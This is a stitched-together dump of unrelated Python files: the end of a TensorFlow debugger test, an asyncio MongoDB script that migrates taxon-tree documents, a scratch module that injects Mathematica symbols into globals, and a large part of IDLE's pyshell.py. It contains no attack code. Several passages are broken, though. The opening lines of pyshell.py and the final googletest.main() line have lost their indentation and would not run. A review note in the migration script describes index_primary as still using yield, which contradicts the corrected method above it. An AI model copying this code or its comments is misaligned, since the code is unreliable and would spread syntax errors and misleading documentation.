            os.path.join(self._dump_roots[index], "_tfdbg_core*"))

        timestamps = []
        session_run_indices = []
        executor_step_indices = []
        for core_metadata_file in core_metadata_files:
          with open(core_metadata_file, "rb") as f:
            event = event_pb2.Event()
            event.ParseFromString(f.read())
            core_metadata = (
                debug_data.extract_core_metadata_from_event_proto(event))
            timestamps.append(event.wall_time)
            session_run_indices.append(core_metadata.session_run_index)
            executor_step_indices.append(core_metadata.executor_step_index)

        all_session_run_indices.extend(session_run_indices)

        # Assert that executor_step_index increases by one at a time.
        executor_step_indices = zip(timestamps, executor_step_indices)
        executor_step_indices = sorted(
            executor_step_indices, key=lambda x: x[0])
        for i in xrange(len(executor_step_indices) - 1):
          # Modernized: assertEquals is a deprecated alias of assertEqual.
          self.assertEqual(executor_step_indices[i][1] + 1,
                           executor_step_indices[i + 1][1])

        # Assert that session_run_index increase monotonically.
        session_run_indices = zip(timestamps, session_run_indices)
        session_run_indices = sorted(session_run_indices, key=lambda x: x[0])
        for i in xrange(len(session_run_indices) - 1):
          self.assertGreater(session_run_indices[i + 1][1],
                             session_run_indices[i][1])

      # Assert that the session_run_indices from the concurrent run() calls
      # are all unique.
      self.assertEqual(len(all_session_run_indices),
                       len(set(all_session_run_indices)))
if __name__ == "__main__":
googletest.main()
|
migrate_taxon_tree.py | from datanator_query_python.config import motor_client_manager
import asyncio
import simplejson as json
from pymongo import UpdateOne
from pymongo.errors import BulkWriteError
from pprint import pprint
class MigrateTaxon:
    """Migrate ``taxon_tree`` documents between MongoDB databases.

    Each migrated document gains ``canon_anc_ids``/``canon_anc_names`` (the
    subset of its ancestors at canonical taxonomic ranks) and a
    ``schema_version`` field, and is upserted into the destination collection.
    """

    def __init__(self, collection="taxon_tree", to_database="datanator-test",
                 from_database="datanator", max_entries=float("inf")):
        self.collection = collection
        self.to_database = to_database
        self.from_collection = motor_client_manager.client.get_database(from_database)[collection]
        self.to_collection = motor_client_manager.client.get_database(to_database)[collection]
        self.max_entries = max_entries

    async def index_primary(self, _key, background=True):
        """Index key (single key ascending)

        Args:
            _key(:obj:`str`): Name of key to be indexed.
            background(:obj:`bool`): Building index in the background.
        """
        # Bug fix: this method previously used ``yield``, which turned it into
        # an async generator that was never iterated, so the index was never
        # actually created. Await the motor coroutine and return its result.
        return await self.to_collection.create_index(_key, background=background)

    async def get_rank(self, ids, names):
        ''' Given a list of taxon ids, return
            the list of ranks. no rank = '+'

        Args:
            ids(:obj:`list` of :obj:`int`): list of taxon ids [1234,2453,431]
            names(:obj:`list` of :obj:`str`): list of taxon names.

        Return:
            (:obj:`tuple`): canon_anc_id, canon_anc_name
        '''
        canon_anc_id = []
        canon_anc_name = []
        roi = ['species', 'genus', 'family', 'order', 'class', 'phylum', 'kingdom', 'superkingdom']
        projection = {'rank': 1}
        for _id, name in zip(ids, names):
            if _id == 131567:
                # Taxon 131567 ("cellular organisms" pseudo-root) is always
                # kept, regardless of rank.
                canon_anc_id.append(_id)
                canon_anc_name.append(name)
                continue
            query = {'tax_id': _id}
            doc = await self.from_collection.find_one(filter=query, projection=projection)
            # Robustness: the ancestor may be absent from the source
            # collection; treat a missing document as having no rank instead
            # of raising AttributeError on None.
            rank = doc.get('rank', None) if doc is not None else None
            if rank in roi:
                canon_anc_id.append(_id)
                canon_anc_name.append(name)
        return canon_anc_id, canon_anc_name

    async def process_cursors(self, skip=0):
        """Transform every source document and upsert it into the destination.

        Accumulated ``UpdateOne`` operations are flushed in bulk every 100
        documents, with a final flush at the end.

        Args:
            skip(:obj:`int`): unused placeholder kept for interface
                compatibility with earlier parallel-processing code.
        """
        bulk_write = []
        if self.max_entries == float("inf"):
            limit = 0  # pymongo/motor convention: limit=0 means "no limit".
        else:
            limit = self.max_entries
        docs = self.from_collection.find(filter={}, projection={'_id': 0},
                                         no_cursor_timeout=True, batch_size=1000,
                                         limit=limit)
        i = 0
        async for doc in docs:
            i += 1
            if i != 0 and i % 100 == 0:
                print("Processing file {}".format(i))
                try:
                    # Bug fix: motor's bulk_write is a coroutine; previously it
                    # was not awaited, so the writes never executed and
                    # BulkWriteError could never be raised/caught here.
                    await self.to_collection.bulk_write(bulk_write)
                    bulk_write = []
                except BulkWriteError as bwe:
                    pprint(bwe.details)
                    bulk_write = []
            canon_anc_names = []
            canon_anc_ids = []
            anc_ids = doc['anc_id']
            anc_names = doc['anc_name']
            canon_anc_ids, canon_anc_names = await self.get_rank(anc_ids, anc_names)
            doc['canon_anc_ids'] = canon_anc_ids
            doc['canon_anc_names'] = canon_anc_names
            doc['schema_version'] = '2'
            bulk_write.append(UpdateOne({'tax_id': doc['tax_id']}, {'$set': doc}, upsert=True))
        if len(bulk_write) != 0:
            try:
                # Bug fix: same missing await as above for the final flush.
                await self.to_collection.bulk_write(bulk_write)
            except BulkWriteError as bwe:
                pprint(bwe.details)
            finally:
                print("Done.")
def main():
    """Entry point: index the destination collection, then run the migration."""
    src = MigrateTaxon(to_database="test")
    # NOTE(review): index_primary is declared ``async`` (and uses ``yield``),
    # so this bare call only creates an async generator/coroutine object and
    # never creates the index — it should be driven on the event loop below.
    # Confirm and fix together with index_primary.
    src.index_primary('tax_id')
    # cursors = src.split_cursors(1, 'datanator', 'taxon_tree')
    # lock = Lock()
    # counter = Counter(0)
    # procs = [Process(target=src.process_cursors, args=(docs, lock, counter)) for docs in cursors]
    # for p in procs: p.start()
    # for p in procs: p.join()
    loop = asyncio.get_event_loop()
    loop.run_until_complete(src.process_cursors())


if __name__ == '__main__':
    main()
test.py | # import threading
#
# class hello:
# say_hello = False
#
# def poll(cls):
# import time
#
# while not cls.say_hello:
# pass
#
# time.sleep(.1)
# poll(cls)
#
# thd = threading.Thread(target=poll, args=(hello,))
#
# thd.start()
#
# import code
# code.interact(banner="", local=locals())
from PJLink.HelperClasses import *
__getattr__ = None
class MathematicaBlock:
    """Context manager that temporarily injects Mathematica symbol names into
    the module's global namespace for the duration of a ``with`` block.

    On exit the previous globals are restored (when ``update_globals`` is
    True).
    """

    __TOTO = None
    # Shared symbol table built on first successful package initialization.
    __sym_dict = {}

    def __init__(self, update_globals=True):
        if self.__TOTO is not None:
            raise TypeError("MathematicaSyntax is a standalone object")
        self.__ns = None
        self.__getatt = None
        self.__ug = update_globals

    def __enter__(self):
        if MPackage.initialize_default():
            self.__sym_dict.update(dict(MPackage.symbol_list))
            # Bug fix: the original called update((("Sym", MPackage))), where
            # the doubled parentheses are redundant, so the tuple
            # ("Sym", MPackage) was passed as a sequence of key/value pairs
            # and raised ValueError at runtime ("Sym" is not a 2-item pair).
            # Assign the single entry directly instead.
            self.__sym_dict["Sym"] = MPackage
        if self.__ug:
            # Snapshot globals so __exit__ can restore them verbatim.
            self.__glob = globals().copy()
            globals().update(self.__sym_dict)
        return self.__sym_dict

    def __exit__(self, exc_type, exc_val, exc_tb):
        if self.__ug:
            globals().clear()
            globals().update(self.__glob)
            self.__glob = None
# with MathematicaBlock():
# print(Evaluate(Plus(M.a, M.b)))
def floop():
    """Return the local-variable mapping of the calling frame."""
    import inspect
    caller = inspect.currentframe().f_back
    return caller.f_locals
pyshell.py | #! /usr/bin/env python3
import sys
try:
from tkinter import *
except ImportError:
print("** IDLE can't import Tkinter.\n"
"Your Python may not be configured for Tk. **", file=sys.__stderr__)
raise SystemExit(1)
# Valid arguments for the ...Awareness call below are defined in the following.
# https://msdn.microsoft.com/en-us/library/windows/desktop/dn280512(v=vs.85).aspx
if sys.platform == 'win32':
import ctypes
PROCESS_SYSTEM_DPI_AWARE = 1
try:
ctypes.OleDLL('shcore').SetProcessDpiAwareness(PROCESS_SYSTEM_DPI_AWARE)
except (AttributeError, OSError):
pass
import tkinter.messagebox as tkMessageBox
if TkVersion < 8.5:
root = Tk() # otherwise create root in main
root.withdraw()
from idlelib.run import fix_scaling
fix_scaling(root)
tkMessageBox.showerror("Idle Cannot Start",
"Idle requires tcl/tk 8.5+, not %s." % TkVersion,
parent=root)
raise SystemExit(1)
from code import InteractiveInterpreter
import linecache
import os
import os.path
from platform import python_version
import re
import socket
import subprocess
import threading
import time
import tokenize
import warnings
from idlelib.colorizer import ColorDelegator
from idlelib.config import idleConf
from idlelib import debugger
from idlelib import debugger_r
from idlelib.editor import EditorWindow, fixwordbreaks
from idlelib.filelist import FileList
from idlelib.outwin import OutputWindow
from idlelib import rpc
from idlelib.run import idle_formatwarning, PseudoInputFile, PseudoOutputFile
from idlelib.undo import UndoDelegator
HOST = '127.0.0.1' # python execution server on localhost loopback
PORT = 0 # someday pass in host, port for remote debug capability
# Override warnings module to write to warning_stream. Initialize to send IDLE
# internal warnings to the console. ScriptBinding.check_syntax() will
# temporarily redirect the stream to the shell window to display warnings when
# checking user's code.
warning_stream = sys.__stderr__ # None, at least on Windows, if no console.
def idle_showwarning(
        message, category, filename, lineno, file=None, line=None):
    """Show Idle-format warning (after replacing warnings.showwarning).

    The differences are the formatter called, the file=None replacement,
    which can be None, the capture of the consequent AttributeError,
    and the output of a hard-coded prompt.
    """
    target = file if file is not None else warning_stream
    try:
        text = idle_formatwarning(
            message, category, filename, lineno, line=line)
        target.write(text)
        target.write(">>> ")
    except (AttributeError, OSError):
        # The stream (probably __stderr__) may be missing or closed;
        # silently skip the warning in that case.
        pass
# Holds the stock warnings.showwarning while IDLE's replacement is active.
_warnings_showwarning = None

def capture_warnings(capture):
    """Install idle_showwarning as warnings.showwarning, or restore the original.

    The previous handler is stashed in the module-global
    _warnings_showwarning so a later capture_warnings(False) can undo the
    swap.  Calling either direction twice in a row is a no-op.
    """
    global _warnings_showwarning
    if capture and _warnings_showwarning is None:
        # First capture: remember the stock handler, then install ours.
        _warnings_showwarning = warnings.showwarning
        warnings.showwarning = idle_showwarning
    elif not capture and _warnings_showwarning is not None:
        # Restore only if a capture is actually active.
        warnings.showwarning = _warnings_showwarning
        _warnings_showwarning = None

capture_warnings(True)
def extended_linecache_checkcache(filename=None,
                                  orig_checkcache=linecache.checkcache):
    """Run linecache.checkcache() while preserving <pyshell#...> entries.

    The shell's pseudo-files exist only in the line cache, so the stock
    checkcache() would discard them.  Pull every '<...>'-keyed entry out,
    delegate to the original function (bound at definition time so the
    patch below does not recurse), then restore the saved entries.
    """
    cache = linecache.cache
    preserved = {key: cache.pop(key)
                 for key in list(cache)
                 if key.startswith('<') and key.endswith('>')}
    orig_checkcache(filename)
    cache.update(preserved)

# Patch linecache.checkcache():
linecache.checkcache = extended_linecache_checkcache
class PyShellEditorWindow(EditorWindow):
    "Regular text edit window in IDLE, supports breakpoints"

    def __init__(self, *args):
        # Line numbers with an active breakpoint in this window.
        self.breakpoints = []
        EditorWindow.__init__(self, *args)
        self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here)
        self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here)
        self.text.bind("<<open-python-shell>>", self.flist.open_shell)

        # Persistent store of per-file breakpoints in the user config dir.
        self.breakpointPath = os.path.join(
                idleConf.userdir, 'breakpoints.lst')
        # whenever a file is changed, restore breakpoints
        def filename_changed_hook(old_hook=self.io.filename_change_hook,
                                  self=self):
            self.restore_file_breaks()
            old_hook()
        self.io.set_filename_change_hook(filename_changed_hook)
        if self.io.filename:
            self.restore_file_breaks()
        self.color_breakpoint_text()

    # Right-click context menu entries: (label, virtual event, enable-check).
    rmenu_specs = [
        ("Cut", "<<cut>>", "rmenu_check_cut"),
        ("Copy", "<<copy>>", "rmenu_check_copy"),
        ("Paste", "<<paste>>", "rmenu_check_paste"),
        (None, None, None),
        ("Set Breakpoint", "<<set-breakpoint-here>>", None),
        ("Clear Breakpoint", "<<clear-breakpoint-here>>", None)
    ]

    def color_breakpoint_text(self, color=True):
        "Turn colorizing of breakpoint text on or off"
        if self.io is None:
            # possible due to update in restore_file_breaks
            return
        if color:
            theme = idleConf.CurrentTheme()
            cfg = idleConf.GetHighlight(theme, "break")
        else:
            cfg = {'foreground': '', 'background': ''}
        self.text.tag_config('BREAK', cfg)

    def set_breakpoint(self, lineno):
        """Tag line *lineno* as a breakpoint and notify the debugger."""
        text = self.text
        filename = self.io.filename
        text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1))
        try:
            self.breakpoints.index(lineno)
        except ValueError:  # only add if missing, i.e. do once
            self.breakpoints.append(lineno)
        try:    # update the subprocess debugger
            debug = self.flist.pyshell.interp.debugger
            debug.set_breakpoint_here(filename, lineno)
        except: # but debugger may not be active right now....
            pass

    def set_breakpoint_here(self, event=None):
        """Event handler: set a breakpoint on the line holding the cursor."""
        text = self.text
        filename = self.io.filename
        if not filename:
            # Unsaved buffer: breakpoints need a filename; just beep.
            text.bell()
            return
        lineno = int(float(text.index("insert")))
        self.set_breakpoint(lineno)

    def clear_breakpoint_here(self, event=None):
        """Event handler: remove the breakpoint on the cursor's line, if any."""
        text = self.text
        filename = self.io.filename
        if not filename:
            text.bell()
            return
        lineno = int(float(text.index("insert")))
        try:
            self.breakpoints.remove(lineno)
        except:
            # Best-effort: no breakpoint on this line is not an error.
            pass
        text.tag_remove("BREAK", "insert linestart",\
                        "insert lineend +1char")
        try:
            debug = self.flist.pyshell.interp.debugger
            debug.clear_breakpoint_here(filename, lineno)
        except:
            # Debugger may not be active; ignore.
            pass

    def clear_file_breaks(self):
        """Remove every breakpoint in this window and tell the debugger."""
        if self.breakpoints:
            text = self.text
            filename = self.io.filename
            if not filename:
                text.bell()
                return
            self.breakpoints = []
            text.tag_remove("BREAK", "1.0", END)
            try:
                debug = self.flist.pyshell.interp.debugger
                debug.clear_file_breaks(filename)
            except:
                # Debugger may not be active; ignore.
                pass

    def store_file_breaks(self):
        "Save breakpoints when file is saved"
        # XXX 13 Dec 2002 KBK Currently the file must be saved before it can
        #     be run.  The breaks are saved at that time.  If we introduce
        #     a temporary file save feature the save breaks functionality
        #     needs to be re-verified, since the breaks at the time the
        #     temp file is created may differ from the breaks at the last
        #     permanent save of the file.  Currently, a break introduced
        #     after a save will be effective, but not persistent.
        #     This is necessary to keep the saved breaks synched with the
        #     saved file.
        #
        #     Breakpoints are set as tagged ranges in the text.
        #     Since a modified file has to be saved before it is
        #     run, and since self.breakpoints (from which the subprocess
        #     debugger is loaded) is updated during the save, the visible
        #     breaks stay synched with the subprocess even if one of these
        #     unexpected breakpoint deletions occurs.
        breaks = self.breakpoints
        filename = self.io.filename
        try:
            with open(self.breakpointPath, "r") as fp:
                lines = fp.readlines()
        except OSError:
            lines = []
        try:
            # Rewrite the file, dropping this file's old entry and
            # appending the current breakpoint list.
            with open(self.breakpointPath, "w") as new_file:
                for line in lines:
                    if not line.startswith(filename + '='):
                        new_file.write(line)
                self.update_breakpoints()
                breaks = self.breakpoints
                if breaks:
                    new_file.write(filename + '=' + str(breaks) + '\n')
        except OSError as err:
            # Warn at most once per session (flag stored on the Tk root).
            if not getattr(self.root, "breakpoint_error_displayed", False):
                self.root.breakpoint_error_displayed = True
                tkMessageBox.showerror(title='IDLE Error',
                        message='Unable to update breakpoint list:\n%s'
                            % str(err),
                        parent=self.text)

    def restore_file_breaks(self):
        """Re-apply this file's saved breakpoints from breakpoints.lst."""
        self.text.update()   # this enables setting "BREAK" tags to be visible
        if self.io is None:
            # can happen if IDLE closes due to the .update() call
            return
        filename = self.io.filename
        if filename is None:
            return
        if os.path.isfile(self.breakpointPath):
            with open(self.breakpointPath, "r") as fp:
                lines = fp.readlines()
            for line in lines:
                if line.startswith(filename + '='):
                    # NOTE(review): eval() trusts the contents of the
                    # user-writable breakpoints.lst; ast.literal_eval would
                    # parse the list literal without executing code.
                    breakpoint_linenumbers = eval(line[len(filename)+1:])
                    for breakpoint_linenumber in breakpoint_linenumbers:
                        self.set_breakpoint(breakpoint_linenumber)

    def update_breakpoints(self):
        "Retrieves all the breakpoints in the current window"
        text = self.text
        ranges = text.tag_ranges("BREAK")
        linenumber_list = self.ranges_to_linenumbers(ranges)
        self.breakpoints = linenumber_list

    def ranges_to_linenumbers(self, ranges):
        """Convert flat (start, stop, start, stop, ...) Tk index pairs into
        the list of line numbers they cover."""
        lines = []
        for index in range(0, len(ranges), 2):
            lineno = int(float(ranges[index].string))
            end = int(float(ranges[index+1].string))
            while lineno < end:
                lines.append(lineno)
                lineno += 1
        return lines

    # XXX 13 Dec 2002 KBK Not used currently
    #     def saved_change_hook(self):
    #         "Extend base method - clear breaks if module is modified"
    #         if not self.get_saved():
    #             self.clear_file_breaks()
    #         EditorWindow.saved_change_hook(self)

    def _close(self):
        "Extend base method - clear breaks when module is closed"
        self.clear_file_breaks()
        EditorWindow._close(self)
class PyShellFileList(FileList):
    "Extend base class: IDLE supports a shell and breakpoints"

    # override FileList's class variable, instances return PyShellEditorWindow
    # instead of EditorWindow when new edit windows are created.
    EditorWindow = PyShellEditorWindow

    # The single shell window shared by all editor windows, or None.
    pyshell = None

    def open_shell(self, event=None):
        """Raise the existing shell window, or create and start a new one.

        Returns the PyShell instance, or None if startup failed.
        """
        if self.pyshell:
            self.pyshell.top.wakeup()
        else:
            self.pyshell = PyShell(self)
            if self.pyshell:
                if not self.pyshell.begin():
                    return None
        return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
    "Extend base class: colorizer for the shell window itself"

    def __init__(self):
        ColorDelegator.__init__(self)
        self.LoadTagDefs()

    def recolorize_main(self):
        # Everything before "iomark" is finished shell output; mark it SYNC
        # so the colorizer never rescans it.
        self.tag_remove("TODO", "1.0", "iomark")
        self.tag_add("SYNC", "1.0", "iomark")
        ColorDelegator.recolorize_main(self)

    def LoadTagDefs(self):
        """Extend the editor's syntax tags with shell-specific stream tags."""
        ColorDelegator.LoadTagDefs(self)
        theme = idleConf.CurrentTheme()
        self.tagdefs.update({
            "stdin": {'background':None,'foreground':None},
            "stdout": idleConf.GetHighlight(theme, "stdout"),
            "stderr": idleConf.GetHighlight(theme, "stderr"),
            "console": idleConf.GetHighlight(theme, "console"),
        })

    def removecolors(self):
        # Don't remove shell color tags before "iomark"
        for tag in self.tagdefs:
            self.tag_remove(tag, "iomark", "end")
class ModifiedUndoDelegator(UndoDelegator):
    "Extend base class: forbid insert/delete before the I/O mark"

    def insert(self, index, chars, tags=None):
        # Refuse edits in the read-only region before "iomark"; beep instead.
        try:
            if self.delegate.compare(index, "<", "iomark"):
                self.delegate.bell()
                return
        except TclError:
            # Index may not be resolvable (e.g. no such mark); allow the edit.
            pass
        UndoDelegator.insert(self, index, chars, tags)

    def delete(self, index1, index2=None):
        # Same guard as insert(): protect text before "iomark".
        try:
            if self.delegate.compare(index1, "<", "iomark"):
                self.delegate.bell()
                return
        except TclError:
            pass
        UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):

    def handle_EOF(self):
        "Override the base class - just re-raise EOFError"
        # Lets the caller (ModifiedInterpreter.poll_subprocess) detect a
        # dead subprocess connection and restart it.
        raise EOFError
class ModifiedInterpreter(InteractiveInterpreter):
    """Interpreter for the shell window.

    When an RPC client (self.rpcclt) is connected, user code is shipped to
    the execution subprocess; otherwise it is exec'd in-process in the
    __main__ namespace (see runcommand/runcode).
    """

    def __init__(self, tkconsole):
        self.tkconsole = tkconsole
        # Execute user code directly in __main__'s namespace.
        locals = sys.modules['__main__'].__dict__
        InteractiveInterpreter.__init__(self, locals=locals)
        self.save_warnings_filters = None
        self.restarting = False
        self.subprocess_arglist = None
        self.port = PORT
        self.original_compiler_flags = self.compile.compiler.flags

    # Tk after() id for the poll loop, RPC client, and Popen handle.
    _afterid = None
    rpcclt = None
    rpcsubproc = None

    def spawn_subprocess(self):
        """Launch the execution server subprocess (argv built lazily once)."""
        if self.subprocess_arglist is None:
            self.subprocess_arglist = self.build_subprocess_arglist()
        self.rpcsubproc = subprocess.Popen(self.subprocess_arglist)

    def build_subprocess_arglist(self):
        """Build the argv used to start the execution server."""
        assert (self.port!=0), (
            "Socket should have been assigned a port number.")
        w = ['-W' + s for s in sys.warnoptions]
        # Maybe IDLE is installed and is being accessed via sys.path,
        # or maybe it's not installed and the idle.py script is being
        # run from the IDLE source directory.
        del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc',
                                       default=False, type='bool')
        if __name__ == 'idlelib.pyshell':
            command = "__import__('idlelib.run').run.main(%r)" % (del_exitf,)
        else:
            command = "__import__('run').main(%r)" % (del_exitf,)
        return [sys.executable] + w + ["-c", command, str(self.port)]

    def start_subprocess(self):
        """Bind the RPC socket, spawn the subprocess, and accept its
        connection.  Returns the RPC client, or None on failure."""
        addr = (HOST, self.port)
        # GUI makes several attempts to acquire socket, listens for connection
        for i in range(3):
            time.sleep(i)
            try:
                self.rpcclt = MyRPCClient(addr)
                break
            except OSError:
                pass
        else:
            self.display_port_binding_error()
            return None
        # if PORT was 0, system will assign an 'ephemeral' port. Find it out:
        self.port = self.rpcclt.listening_sock.getsockname()[1]
        # if PORT was not 0, probably working with a remote execution server
        if PORT != 0:
            # To allow reconnection within the 2MSL wait (cf. Stevens TCP
            # V1, 18.6),  set SO_REUSEADDR.  Note that this can be problematic
            # on Windows since the implementation allows two active sockets on
            # the same address!
            self.rpcclt.listening_sock.setsockopt(socket.SOL_SOCKET,
                                           socket.SO_REUSEADDR, 1)
        self.spawn_subprocess()
        #time.sleep(20) # test to simulate GUI not accepting connection
        # Accept the connection from the Python execution server
        self.rpcclt.listening_sock.settimeout(10)
        try:
            self.rpcclt.accept()
        except socket.timeout:
            self.display_no_subprocess_error()
            return None
        # Expose GUI-side objects to the subprocess by name.
        self.rpcclt.register("console", self.tkconsole)
        self.rpcclt.register("stdin", self.tkconsole.stdin)
        self.rpcclt.register("stdout", self.tkconsole.stdout)
        self.rpcclt.register("stderr", self.tkconsole.stderr)
        self.rpcclt.register("flist", self.tkconsole.flist)
        self.rpcclt.register("linecache", linecache)
        self.rpcclt.register("interp", self)
        self.transfer_path(with_cwd=True)
        self.poll_subprocess()
        return self.rpcclt

    def restart_subprocess(self, with_cwd=False, filename=''):
        """Kill and relaunch the execution server, annotate the shell with a
        RESTART banner, and reattach the debugger if one was active."""
        if self.restarting:
            return self.rpcclt
        self.restarting = True
        # close only the subprocess debugger
        debug = self.getdebugger()
        if debug:
            try:
                # Only close subprocess debugger, don't unregister gui_adap!
                debugger_r.close_subprocess_debugger(self.rpcclt)
            except:
                # Best-effort; the old subprocess may already be gone.
                pass
        # Kill subprocess, spawn a new one, accept connection.
        self.rpcclt.close()
        self.terminate_subprocess()
        console = self.tkconsole
        was_executing = console.executing
        console.executing = False
        self.spawn_subprocess()
        try:
            self.rpcclt.accept()
        except socket.timeout:
            self.display_no_subprocess_error()
            return None
        self.transfer_path(with_cwd=with_cwd)
        console.stop_readline()
        # annotate restart in shell window and mark it
        console.text.delete("iomark", "end-1c")
        tag = 'RESTART: ' + (filename if filename else 'Shell')
        halfbar = ((int(console.width) -len(tag) - 4) // 2) * '='
        console.write("\n{0} {1} {0}".format(halfbar, tag))
        console.text.mark_set("restart", "end-1c")
        console.text.mark_gravity("restart", "left")
        if not filename:
            console.showprompt()
        # restart subprocess debugger
        if debug:
            # Restarted debugger connects to current instance of debug GUI
            debugger_r.restart_subprocess_debugger(self.rpcclt)
            # reload remote debugger breakpoints for all PyShellEditWindows
            debug.load_breakpoints()
        self.compile.compiler.flags = self.original_compiler_flags
        self.restarting = False
        return self.rpcclt

    def __request_interrupt(self):
        # Runs on a worker thread; asks the server to raise KeyboardInterrupt.
        self.rpcclt.remotecall("exec", "interrupt_the_server", (), {})

    def interrupt_subprocess(self):
        """Interrupt running user code from a separate thread so the GUI
        thread is not blocked by the remote call."""
        threading.Thread(target=self.__request_interrupt).start()

    def kill_subprocess(self):
        """Stop polling, close the RPC link, and terminate the subprocess."""
        if self._afterid is not None:
            self.tkconsole.text.after_cancel(self._afterid)
        try:
            self.rpcclt.listening_sock.close()
        except AttributeError:  # no socket
            pass
        try:
            self.rpcclt.close()
        except AttributeError:  # no socket
            pass
        self.terminate_subprocess()
        self.tkconsole.executing = False
        self.rpcclt = None

    def terminate_subprocess(self):
        "Make sure subprocess is terminated"
        try:
            self.rpcsubproc.kill()
        except OSError:
            # process already terminated
            return
        else:
            try:
                self.rpcsubproc.wait()
            except OSError:
                return

    def transfer_path(self, with_cwd=False):
        """Copy the GUI's sys.path into the subprocess."""
        if with_cwd:        # Issue 13506
            path = ['']     # include Current Working Directory
            path.extend(sys.path)
        else:
            path = sys.path

        self.runcommand("""if 1:
        import sys as _sys
        _sys.path = %r
        del _sys
        \n""" % (path,))

    active_seq = None   # sequence number of the request awaiting a response

    def poll_subprocess(self):
        """Poll the subprocess for a response; reschedules itself via
        Tk after() every tkconsole.pollinterval milliseconds."""
        clt = self.rpcclt
        if clt is None:
            return
        try:
            response = clt.pollresponse(self.active_seq, wait=0.05)
        except (EOFError, OSError, KeyboardInterrupt):
            # lost connection or subprocess terminated itself, restart
            # [the KBI is from rpc.SocketIO.handle_EOF()]
            if self.tkconsole.closing:
                return
            response = None
            self.restart_subprocess()
        if response:
            self.tkconsole.resetoutput()
            self.active_seq = None
            how, what = response
            console = self.tkconsole.console
            if how == "OK":
                if what is not None:
                    print(repr(what), file=console)
            elif how == "EXCEPTION":
                if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
                    self.remote_stack_viewer()
            elif how == "ERROR":
                errmsg = "pyshell.ModifiedInterpreter: Subprocess ERROR:\n"
                print(errmsg, what, file=sys.__stderr__)
                print(errmsg, what, file=console)
            # we received a response to the currently active seq number:
            try:
                self.tkconsole.endexecuting()
            except AttributeError:  # shell may have closed
                pass
        # Reschedule myself
        if not self.tkconsole.closing:
            self._afterid = self.tkconsole.text.after(
                self.tkconsole.pollinterval, self.poll_subprocess)

    debugger = None     # active debugger GUI adapter, or None

    def setdebugger(self, debugger):
        self.debugger = debugger

    def getdebugger(self):
        return self.debugger

    def open_remote_stack_viewer(self):
        """Initiate the remote stack viewer from a separate thread.

        This method is called from the subprocess, and by returning from this
        method we allow the subprocess to unblock.  After a bit the shell
        requests the subprocess to open the remote stack viewer which returns
        a static object looking at the last exception.  It is queried through
        the RPC mechanism.
        """
        self.tkconsole.text.after(300, self.remote_stack_viewer)
        return

    def remote_stack_viewer(self):
        """Open a tree window browsing the subprocess's last traceback."""
        from idlelib import debugobj_r
        oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {})
        if oid is None:
            # No traceback available remotely; just beep.
            self.tkconsole.root.bell()
            return
        item = debugobj_r.StubObjectTreeItem(self.rpcclt, oid)
        from idlelib.tree import ScrolledCanvas, TreeNode
        top = Toplevel(self.tkconsole.root)
        theme = idleConf.CurrentTheme()
        background = idleConf.GetHighlight(theme, 'normal')['background']
        sc = ScrolledCanvas(top, bg=background, highlightthickness=0)
        sc.frame.pack(expand=1, fill="both")
        node = TreeNode(sc.canvas, None, item)
        node.expand()
        # XXX Should GC the remote tree when closing the window

    gid = 0     # counter for generating unique <pyshell#N> pseudo-filenames

    def execsource(self, source):
        "Like runsource() but assumes complete exec source"
        filename = self.stuffsource(source)
        self.execfile(filename, source)

    def execfile(self, filename, source=None):
        "Execute an existing file"
        if source is None:
            with tokenize.open(filename) as fp:
                source = fp.read()
            if use_subprocess:
                # Give the script a real __file__, then clean it up.
                source = (f"__file__ = r'''{os.path.abspath(filename)}'''\n"
                          + source + "\ndel __file__")
        try:
            code = compile(source, filename, "exec")
        except (OverflowError, SyntaxError):
            self.tkconsole.resetoutput()
            print('*** Error in script or command!\n'
                  'Traceback (most recent call last):',
                  file=self.tkconsole.stderr)
            InteractiveInterpreter.showsyntaxerror(self, filename)
            self.tkconsole.showprompt()
        else:
            self.runcode(code)

    def runsource(self, source):
        "Extend base class method: Stuff the source in the line cache first"
        filename = self.stuffsource(source)
        self.more = 0
        # Temporarily escalate SyntaxWarning to an error so it is reported
        # at the point of entry; filters are restored in the finally clause.
        self.save_warnings_filters = warnings.filters[:]
        warnings.filterwarnings(action="error", category=SyntaxWarning)
        # at the moment, InteractiveInterpreter expects str
        assert isinstance(source, str)
        #if isinstance(source, str):
        #    from idlelib import iomenu
        #    try:
        #        source = source.encode(iomenu.encoding)
        #    except UnicodeError:
        #        self.tkconsole.resetoutput()
        #        self.write("Unsupported characters in input\n")
        #        return
        try:
            # InteractiveInterpreter.runsource() calls its runcode() method,
            # which is overridden (see below)
            return InteractiveInterpreter.runsource(self, source, filename)
        finally:
            if self.save_warnings_filters is not None:
                warnings.filters[:] = self.save_warnings_filters
                self.save_warnings_filters = None

    def stuffsource(self, source):
        "Stuff source in the filename cache"
        filename = "<pyshell#%d>" % self.gid
        self.gid = self.gid + 1
        lines = source.split("\n")
        linecache.cache[filename] = len(source)+1, 0, lines, filename
        return filename

    def prepend_syspath(self, filename):
        "Prepend sys.path with file's directory if not already included"
        self.runcommand("""if 1:
            _filename = %r
            import sys as _sys
            from os.path import dirname as _dirname
            _dir = _dirname(_filename)
            if not _dir in _sys.path:
                _sys.path.insert(0, _dir)
            del _filename, _sys, _dirname, _dir
            \n""" % (filename,))

    def showsyntaxerror(self, filename=None):
        """Override Interactive Interpreter method: Use Colorizing

        Color the offending position instead of printing it and pointing at it
        with a caret.
        """
        tkconsole = self.tkconsole
        text = tkconsole.text
        text.tag_remove("ERROR", "1.0", "end")
        type, value, tb = sys.exc_info()
        msg = getattr(value, 'msg', '') or value or "<no detail available>"
        lineno = getattr(value, 'lineno', '') or 1
        offset = getattr(value, 'offset', '') or 0
        if offset == 0:
            lineno += 1  #mark end of offending line
        if lineno == 1:
            pos = "iomark + %d chars" % (offset-1)
        else:
            pos = "iomark linestart + %d lines + %d chars" % \
                  (lineno-1, offset-1)
        tkconsole.colorize_syntax_error(text, pos)
        tkconsole.resetoutput()
        self.write("SyntaxError: %s\n" % msg)
        tkconsole.showprompt()

    def showtraceback(self):
        "Extend base class method to reset output properly"
